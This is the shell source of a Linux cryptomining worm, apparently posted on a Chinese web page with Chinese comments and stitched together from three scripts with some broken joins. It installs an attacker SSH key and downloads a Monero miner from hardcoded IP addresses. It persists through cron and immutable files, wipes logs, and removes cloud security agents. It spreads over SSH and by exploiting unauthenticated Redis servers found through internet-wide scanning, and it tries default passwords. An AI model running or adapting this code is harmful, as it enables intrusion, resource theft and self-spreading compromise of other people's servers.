echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCon+ogu86pIjSVJjPl3aERqrWFI7AvtzMqzTsj9nWNXLHSosyTfJ3PwL4TkG4oicsBvGlgnlYJHSK157LLHGHRYEtzjyMpfeGuAkrrgk47WtJVJajv4XipVHQWZlYk36kJfzQPPWG054FDHPND77BQOwtuy47ZIBm+laXPV3NJ68V7wycOlSFMp4O6VXwC/iYMlsEhrmhEiNJyop6xBDVr6pwhKvUsJrRYmbKaZoK8bDQirQN3NA4j/nCaXoHxw9CvCvMERVtV/mgati+P1/5t7we16lKZXy5x/KitarrT34D73o8sbHzQeQYih7Bmc972WZalyaGJcw0FlagAPDGFx+XhOS+sQHATBcIZS4/8Apd51903UhGMoNBjnK7YMYmg+51sbfoNCJ3gehcltaMW1aIUMyFq8PF0yMbjHxPEkIM7fJM7yadgnAS7xYGevXwHY95SKPtWbZdRK1mEBgnttkO4qOR9QGeVXoCJ0uFjlnYM8oF4OjpyKlPOVI4cDiVBoKG2G7dZ2FS0hhyRWvDJBLWbC4No+Ynz0aTX/YmUv1cxb8zZuq1lbmFX9NR06o6ZhVSxFJhPfnjorILdslFUypUDZUhDF/SMSSG2gg/bj4rfcxBgunozNZjd6yP449hTlil03civrIv6pokPyNQW1w2vlZ4kX7wAfH/GHQ7SCQ== user@email.com\" > /root/.ssh/authorized_keys
cd1 http://45.133.203.192/cleanfda/call.txt
wget -q -O- http://45.133.203.192/cleanfda/call.txt
file=\"/etc/zzh\"
if [ -f \"/etc/zzh\" ]
then
filesize1=`ls -l /etc/zzh | awk \'{ print $5 }\'`
if [ \"$filesize1\" -ne \"$miner_size\" ]
then
pkill -f zzh
rm /etc/zzh
downloads $miner_url /etc/zzh $miner_url_backup
else
echo \"not need download\"
fi
else
downloads $miner_url /etc/zzh $miner_url_backup
fi
downloads $sh_url /etc/newinit.sh $sh_url_backup
chmod 777 /etc/zzh
if [ -f \"/bin/ps.original\" ]
then
ps.original -fe|grep zzh |grep -v grep
else
ps -fe|grep zzh |grep -v grep
fi
if [ $? -ne 0 ]
then
cd /etc
echo \"not root runing\"
sleep 5s
# 开始挖矿
./zzh --log-file=/etc/etc --donate-level 1 --keepalive --no-color --cpu-priority 5 -o xmr.f2pool.com:13531 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean -k --coin monero -o 139.99.102.72:14433 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean --tls -k --coin monero -o xmr.pool.gntl.co.uk:10009 -u 87q6aU1M9xmQ5p3wh8Jzst5mcFfDzKEuuDjV6u7Q7UDnAXJR7FLeQH2UYFzhQatde2WHuZ9LbxRsf3PGA8gpnGXL3G7iWMv.clean --tls -k --coin monero -o 80.211.206.105:9000 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean --tls -k --coin monero --background &
else
echo \"root runing.....\"
fi
chmod 777 /etc/zzh
chattr +ia /etc/zzh
chmod 777 /etc/newinit.sh
chattr +ia /etc/newinit.sh
chmod 600 /root/.ssh/authorized_keys
chattr +ia /root/.ssh/authorized_keys
else
echo \"goto 1\" > /tmp/zzhs
chattr -ia /tmp/zzh*
chattr -ia /tmp/newinit.sh*
if [ ! -f \"/usr/bin/crontab\" ]
then
unlock_cron
echo \"*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1\" >> ${crondir}
lock_cron
else
unlock_cron
[[ $cont =~ \"newinit.sh\" ]] || (crontab -l ; echo \"*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1\") | crontab -
lock_cron
fi
if [ -f \"/tmp/zzh\" ]
then
filesize1=`ls -l /tmp/zzh | awk \'{ print $5 }\'`
if [ \"$filesize1\" -ne \"$miner_size\" ]
then
pkill -f zzh
rm /tmp/zzh
downloads $miner_url /tmp/zzh $miner_url_backup
else
echo \"no need download\"
fi
else
downloads $miner_url /tmp/zzh $miner_url_backup
fi
echo \"i am here\"
downloads $sh_url /tmp/newinit.sh $sh_url_backup
ps -fe|grep zzh |grep -v grep
if [ $? -ne 0 ]
then
echo \"not tmp runing\"
cd /tmp
chmod 777 zzh
sleep 5s
# 开始挖矿
./zzh --log-file=/etc/etc --donate-level 1 --keepalive --no-color --cpu-priority 5 -o xmr.f2pool.com:13531 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean -k --coin monero -o 139.99.102.72:14433 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean --tls -k --coin monero -o xmr.pool.gntl.co.uk:10009 -u 87q6aU1M9xmQ5p3wh8Jzst5mcFfDzKEuuDjV6u7Q7UDnAXJR7FLeQH2UYFzhQatde2WHuZ9LbxRsf3PGA8gpnGXL3G7iWMv.clean --tls -k --coin monero -o 80.211.206.105:9000 -u 82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4.clean --tls -k --coin monero --background &
else
echo \"tmp runing.....\"
fi
chmod 777 /tmp/zzh
chattr +i /tmp/zzh
chmod 777 /tmp/newinit.sh
chattr +i /tmp/newinit.sh
fi
# 开放防火墙
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 10008 -j DROP
service iptables reload
# 清除相关历史记录
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
chmod 444 /usr/bin/chattr
chmod 444 /bin/chattr
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
# 扩散感染已经免密的机器
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE \"\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b\" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \'curl -o- http://45.133.203.192/cleanfda/init.sh | bash >/dev/null 2>&1 &\' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE \"\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b\" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \'cd1 -o- http://45.133.203.192/cleanfda/init.sh | bash >/dev/null 2>&1 &\' & done
fi
echo \"$bbdir\"
echo \"$bbdira\"
# 下载执行is.sh 主要功能是下载扫描器
$bbdir -fsSL http://45.133.203.192/cleanfda/is.sh | bash
$bbdira -fsSL http://45.133.203.192/cleanfda/is.sh | bashis.sh
#!/bin/sh
bbdir=\"/usr/bin/curl\"
bbdira=\"/usr/bin/cd1\"
ccdir=\"/usr/bin/wget\"
ccdira=\"/usr/bin/wd1\"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
# 创建文件夹 存放扫描器安装包
mkdir -p .ice-unix/... && chmod -R 777 .ice-unix && cd .ice-unix/...
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
# 杀掉其他扫描器
ps x | awk \'!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}\' | xargs kill -9 2>/dev/null
ps x | awk \'!/awk/ && /barad_agent|masscan|\\.sr0|clay|udevs|\\.sshd|xig/ {print $1}\' | xargs kill -9 2>/dev/null
sleep 1
if [ -x \"$(command -v apt-get)\" ]; then
export DEBIAN_FRONTEND=noninteractive
# 安装依赖库
apt-get update -y --exclude=procps* psmisc*
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
# 安装redis 用于redis未授权访问
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
apt-get install -y masscan
apt-get install -y unhide
fi
if [ -x \"$(command -v yum)\" ]; then
dnf config-manager --set-enabled PowerTools
dnf config-manager --set-enabled powertools
yum update -y --exclude=procps* psmisc*
yum install -y epel-release
yum update -y --exclude=procps* psmisc*
yum install -y git iptables make gcc redis libpcap libpcap-devel masscan
yum install -y unhide
fi
sleep 1
echo \"Software Installed\"
# 杀掉隐藏的进程
dddir=\"/usr/sbin/unhide\"
$dddir quick |grep PID:|awk \'{print $4}\'|xargs -I % kill -9 % 2>/dev/null
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
# 把以下文件删掉
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
# 干掉阿里云的云盾
if ps aux | grep -i \'[a]liyun\'; then
downloads http://update.aegis.aliyun.com/download/uninstall.sh | bash
downloads http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i \'[y]unjing\'; then
# 干掉腾讯云的云镜
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo \"DER Uninstalled\"
# 下载模块
downloads()
{
if [ -f \"/usr/bin/curl\" ]
then
echo $1,$2
http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ \"$http_code\" -eq \"200\" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
elif [ \"$http_code\" -eq \"405\" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f \"/usr/bin/cd1\" ]
then
http_code = `cd1 -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ \"$http_code\" -eq \"200\" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
elif [ \"$http_code\" -eq \"405\" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
else
cd1 --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f \"/usr/bin/wget\" ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f \"/usr/bin/wd1\" ]
then
wd1 --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=10 --tries=100 -O $2 $3
fi
fi
}
if ! [ -x \"$(command -v masscan)\" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
# 下载masscan扫描器
$bbdira -sL -o x1.tar.gz http://45.133.203.192/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo \"Masscan Installed\"
fi
echo \"Masscan Already Installed\"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
# 下载pnscan扫描器
$bbdira -sL -o .x112 http://45.133.203.192/cleanfda/pnscan.tar.gz || $ccdira -q -O .x112 http://45.133.203.192/cleanfda/pnscan.tar.gz
sleep 1
[ -f .x112 ] && tar zxf .x112 && cd pnscan && ./configure && make && make install && cd .. && rm -rf pnscan .x112
echo \"Pnscan Installed\"
fi
echo \"Pnscan Already Installed\"
#执行rs.sh
$bbdir -fsSL http://45.133.203.192/cleanfda/rs.sh | bash
$bbdira -fsSL http://45.133.203.192/cleanfda/rs.sh | bashrs.sh
#!/bin/sh
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
# 让防火墙放行 6379 端口
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
# 判断pnscan是否存在
if [ -f \"/bin/ps.original\" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
# 删除其他残留文件
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
# 自动化利用redis未授权 写计划任务
echo \'config set dbfilename \"backup.db\"\' > .dat
echo \'save\' >> .dat
echo \'config set stop-writes-on-bgsave-error no\' >> .dat
echo \'flushall\' >> .dat
echo \'set backup1 \"\\n\\n\\n*/2 * * * * cd1 -fsSL http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup2 \"\\n\\n\\n*/3 * * * * wget -q -O- http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup3 \"\\n\\n\\n*/4 * * * * curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup4 \"\\n\\n\\n*/5 * * * * wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'config set dir \"/var/spool/cron/\"\' >> .dat
echo \'config set dbfilename \"root\"\' >> .dat
echo \'save\' >> .dat
echo \'config set dir \"/var/spool/cron/crontabs\"\' >> .dat
echo \'save\' >> .dat
echo \'flushall\' >> .dat
echo \'set backup1 \"\\n\\n\\n*/2 * * * * root cd1 -fsSL http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup2 \"\\n\\n\\n*/3 * * * * root wget -q -O- http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup3 \"\\n\\n\\n*/4 * * * * root curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'set backup4 \"\\n\\n\\n*/5 * * * * root wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"\' >> .dat
echo \'config set dir \"/etc/cron.d/\"\' >> .dat
echo \'config set dbfilename \"zzh\"\' >> .dat
echo \'save\' >> .dat
echo \'config set dir \"/etc/\"\' >> .dat
echo \'config set dbfilename \"crontab\"\' >> .dat
echo \'save\' >> .dat
echo \'config set dir \"/var/spool/cron/\"\' >> .dat
echo \'config set dbfilename \"root\"\' >> .dat
echo \'save\' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
for x in $( seq 1 223 | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
# 利用pnscan 扫描b段 6379
$pnx -t512 -R \'6f 73 3a 4c 69 6e 75 78\' -W \'2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a\' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk \'/Linux/ {print $1, $3}\' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
# 利用reids未授权
cat .dat | redis-cli -h $h -p $p --raw &
cat .dat | redis-cli -h $h -p $p -a redis --raw &
cat .dat | redis-cli -h $h -p $p -a root --raw &
cat .dat | redis-cli -h $h -p $p -a oracle --raw &
cat .dat | redis-cli -h $h -p $p -a password --raw &
cat .dat | redis-cli -h $h -p $p -a p@aaw0rd --raw &
cat .dat | redis-cli -h $h -p $p -a abc123 --raw &
cat .dat | redis-cli -h $h -p $p -a abc123! --raw &
cat .dat | redis-cli -h $h -p $p -a 123456 --raw &
cat .dat | redis-cli -h $h -p $p -a admin --raw &
done /dev/null | awk \'{print $6, substr($4, 1, length($4)-4)}\' | sort | uniq > test
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done /dev/null | awk \'{print $6, substr($4, 1, length($4)-4)}\' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done /dev/null | sed \'s/\\/\\([0-9]\\{2\\}\\)/\\/16/g\' > .inet
sleep 1
masscan --max-rate 30000 -p6379 -iL .inet | awk \'{print $6, substr($4, 1, length($4)-4)}\' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done /tmp/ipss
nohup /tmp/hxx 50 -f /tmp/ipss /tmp/ps 22 \'curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh; wget -q -O- http://45.133.203.192/cleanfda/init.sh | sh; lwp-download http://45.133.203.192/cleanfda/init.sh /tmp/init.sh; bash /tmp/init.sh; rm -rf /tmp/init.sh\' >/dev/null 2>&1
echo \"Finished\"
pkill -9 hxx
else
echo \"no rooot\"
fi
else
echo \"runing\"
fi
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo \"root runing.....\"
fi
评论前必须登录!
注册